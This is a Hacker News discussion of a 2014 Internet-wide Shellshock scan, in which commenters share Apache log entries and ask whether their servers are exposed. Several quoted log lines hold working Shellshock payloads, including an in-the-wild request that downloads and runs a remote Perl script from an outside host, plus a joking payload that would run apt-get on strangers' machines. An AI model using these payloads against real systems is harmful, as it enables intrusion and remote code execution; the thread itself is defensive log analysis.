Bash 'shellshock' scan of the Internet

[+] agwa|11 years ago|reply

I've been monitoring my Apache logs all day for the string "() {". So far Robert Graham's scan is the only match. This is what the log entry looks like:

  209.126.230.72 - - [24/Sep/2014:22:07:56 +0000] "GET / HTTP/1.0" 403 492 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

[+] gojomo|11 years ago|reply

Someone not wanting to stick out might only probe headers that are less-often logged, but still possibly passed-along as environment variables. Has anyone logged 'HTTP_FROM' in a long while?

[+] ProblemFactory|11 years ago|reply

Thanks for the idea. Looks like there is someone out there already trying to download and install remote shells:

    access.log:89.207.135.125 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"

Any suggestions on how to best check if they succeeded? I think I'm safe as I upgraded Ubuntu Bash right after the announcement, and run Nginx+Uwsgi instead of Apache with CGI enabled. But Nginx might set some environment variables somewhere as well.

[+] mappu|11 years ago|reply

I was scanned several times - looks like there were a few false starts and different ping commands: http://pastebin.com/badL7dtk

[+] gojomo|11 years ago|reply

Now, just to repeat the scan with:

  Referer: () { :; }; sudo apt-get update && sudo apt-get install --only-upgrade bash

"Why, who was that masked sysadmin? We didn't even get the chance to thank him."

[+] gcr|11 years ago|reply

Who would grant `sudo` privileges to `www-data` without asking for a password? That's just asking for a bad time.

[+] NamTaf|11 years ago|reply

Does this qualify as white-hat or grey-hat hacking? Does the doing only good outweigh the bad of modifying someone else's system?

[+] xnull2guest|11 years ago|reply

Yikes, that redaction... even if it didn't miss digits that's a mighty small search space.

Really interested to see where the bug crops up aside from CGI scripts.

[+] unknown|11 years ago|reply

[deleted]

[+] thefreeman|11 years ago|reply

Not saying I agree with it, but personally I would be worried about prosecution from doing something like the scan he is doing.

[+] nwh|11 years ago|reply

Especially as it's actually executing code on other people's computers, you can't even really say it's just observation at that point.

[+] joeshaw|11 years ago|reply

The DHCP attack vector is the one that is scariest to me. We know that dhclient on Linux is vulnerable, but the number of unpatched Linux machines on a public wifi network will likely be too small to be worthwhile to try to capture. Macs on the other hand are prevalent in places like coffee shops, and Apple is notoriously slow to patch security vulnerabilities in their operating systems. Has anyone done much analysis on OS X's vulnerability to this bug?

[+] rsmarples|11 years ago|reply

dhcpcd-6.4.7 is not vulnerable to this issue as it sanitises variables before calling the shell.

[+] wcfields|11 years ago|reply

I see you!

209.126.230.72 - - [24/Sep/2014:15:04:17 -0700] "GET / HTTP/1.0" 200 62 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...

209.126.230.72 - - [24/Sep/2014:17:14:58 -0700] "GET / HTTP/1.0" 200 62 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...

[+] lcedp|11 years ago|reply

Now I see him

    209.126.230.72 - - [25/Sep/2014:07:43:58 +0300] "GET / HTTP/1.0" 200 151 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

..and someone else

    89.207.135.125 - - [25/Sep/2014:12:51:01 +0300] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

[+] piran|11 years ago|reply

I just saw something from 89.207.135.125 -- no idea who that is.

[+] waynecochran|11 years ago|reply

From Apache Log -- should I be worried -- bash not patched on OS X box. Anyone know what this does?

    "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

[+] waynecochran|11 years ago|reply

discussed at http://www.solutionary.com/resource-center/blog/2014/09/shel...

Bad news.

[+] showsover|11 years ago|reply

>Update: Someone is using masscan to deliver malware. They'll likely have compromised most of the system I've found by tomorrow morning. If they using different URLs and fix the Host field, they'll get tons more.

[+] unknown|11 years ago|reply

[deleted]

[+] ilaksh|11 years ago|reply

To be vulnerable to this I need to be running CGI scripts right? I have my system set up with reverse nginx proxies and haproxy TCP mode pass through to things like nginx static files and Node.js servers. Can he run his ping command on my servers? I am thinking not.

[+] nitrogen|11 years ago|reply

No, CGI is just the most obvious use of user-controlled environment variables. Other systems may also set environment variables to user-controlled strings for whatever reason. If such a system ever invokes bash, even indirectly or implicitly, with user-controlled environment variables set, that system is vulnerable.

38 comments